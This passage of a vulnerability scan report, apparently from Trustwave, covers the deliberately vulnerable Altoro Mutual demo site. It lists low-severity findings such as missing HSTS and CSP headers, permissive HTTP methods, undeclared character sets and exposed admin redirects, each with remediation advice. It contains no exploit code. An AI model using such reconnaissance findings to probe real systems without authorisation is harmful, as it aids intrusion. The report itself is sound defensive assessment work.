Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 713 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net:8080/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 714 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 715 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Evidence:
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_1 : DHE-RSA-AES128-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-GCM-SHA384
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-GCM-SHA256
Cipher Suite: TLSv1_2 : DHE-RSA-AES128-SHA256
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 716 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
No remediation is necessary.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 717 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
URL: http://demo.testfire.net/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 718 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117:8080/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: https://demo.testfire.net:443/bank/
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 719 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 720 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
URL: https://demo.testfire.net/swagger/index.html
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
URL: https://65.61.137.117/
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 721 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:80/bank/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 722 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 723 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 724 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 725 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 726 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 727 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 728 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://demo.testfire.net:8443/my%20documents/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 729 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: https://65.61.137.117/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 730 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://demo.testfire.net:8080/swagger/
Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 731 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:80/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 732 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 733 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Evidence:
DetectionDetails: Following External Links Found:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 734 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 735 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
420 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: demo.testfire.net
ip_address: 65.61.137.117
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 736 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:80/admin/
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 737 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 738 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 739 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 740 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 741 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 742 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117/high_yield_investments.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 743 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://65.61.137.117/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 744 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings
Evidence:
URL: http://demo.testfire.net:8080/retirement.htm
Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 745 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat
Evidence:
CPE: apache:tomcat
URI: /
Version: unknown
Remediation:
No remediation is required.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 746 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 747 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Reference:
https://www.owasp.org/index.php/Content_Security_Policy
Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://65.61.137.117:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 748 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 749 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 750 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 751 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 752 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 753 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />
<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 754 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</td>
</div>
</tr>
</table>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 755 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 756 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
During the crawl of the HTTP service, we detected HTML and/or XML
